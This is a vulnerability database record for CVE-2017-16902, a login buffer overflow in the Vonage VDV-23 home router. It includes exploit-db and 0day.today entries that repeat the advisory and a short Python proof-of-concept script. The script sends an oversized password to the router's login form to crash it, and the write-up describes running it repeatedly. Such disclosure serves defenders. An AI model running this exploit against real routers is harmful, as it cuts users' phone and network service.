ID CVE-2017-16902 Type cve Reporter cve@mitre.org Modified 2017-12-12T15:58:00
Description
On the Vonage VDV-23 115 3.2.11-0.9.40 home router, sending a long string of characters in the loginPassword and/or loginUsername field to goform/login causes the router to reboot.
{"exploitdb": [{"lastseen": "2017-11-22T11:00:37", "description": "Vonage VDV-23 - Denial of Service. CVE-2017-16902. Dos exploit for Hardware platform", "published": "2017-11-21T00:00:00", "type": "exploitdb", "title": "Vonage VDV-23 - Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16902"], "modified": "2017-11-21T00:00:00", "id": "EDB-ID:43164", "href": "https://www.exploit-db.com/exploits/43164/", "sourceData": "Overview\r\nDuring an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will be performed to find out if the the crash is controllable and allow for full remote code execution.\r\n\r\nDevice Description:\r\n1 port residential gateway\r\n\r\nHardware Version:\r\nVDV-23: 115\r\n\r\nOriginal Software Version:\r\n3.2.11-0.9.40\r\n\r\nExploitation Writeup\r\nThis exploit was a simple buffer overflow. The use of spike fuzzer took place to identify the crash condition. When the application crashes, the router reboots causing a denial of service condition. The script below was further weaponized to sleep for a 60 second period while the device rebooted then continue one execution after another.\r\n\r\nProof of concept code:\r\nThe code below was used to exploit the application. This testing was only performed against denial of service conditions. The crash that was experienced potentially holds the ability to allow remote code execution. Further research will be performed against the device.\r\n\r\nDOSTest.py\r\n\r\nimport requests\u2028\r\npassw = 'A' * 10580\u2028post_data = {'loginUsername':'router', 'loginPassword':passw, 'x':'0', 'y':'0'}\u2028\r\npost_response = requests.post(url='http://192.168.15.1/goform/login', data=post_data)", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43164/"}], "zdt": [{"lastseen": "2018-02-09T05:19:46", "description": "Exploit for hardware platform in category dos / poc", "edition": 1, "published": "2017-11-22T00:00:00", "title": "Vonage VDV-23 - Denial of Service Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16902"], "modified": "2017-11-22T00:00:00", "href": "https://0day.today/exploit/description/29032", "id": "1337DAY-ID-29032", "sourceData": "Overview\r\nDuring an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will be performed to find out if the the crash is controllable and allow for full remote code execution.\r\n \r\nDevice Description:\r\n1 port residential gateway\r\n \r\nHardware Version:\r\nVDV-23: 115\r\n \r\nOriginal Software Version:\r\n3.2.11-0.9.40\r\n \r\nExploitation Writeup\r\nThis exploit was a simple buffer overflow. The use of spike fuzzer took place to identify the crash condition. When the application crashes, the router reboots causing a denial of service condition. The script below was further weaponized to sleep for a 60 second period while the device rebooted then continue one execution after another.\r\n \r\nProof of concept code:\r\nThe code below was used to exploit the application. This testing was only performed against denial of service conditions. The crash that was experienced potentially holds the ability to allow remote code execution. Further research will be performed against the device.\r\n \r\nDOSTest.py\r\n \r\nimport requests\u2028\r\npassw = 'A' * 10580\u2028post_data = {'loginUsername':'router', 'loginPassword':passw, 'x':'0', 'y':'0'}\u2028\r\npost_response = requests.post(url='http://192.168.15.1/goform/login', data=post_data)\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29032"}]}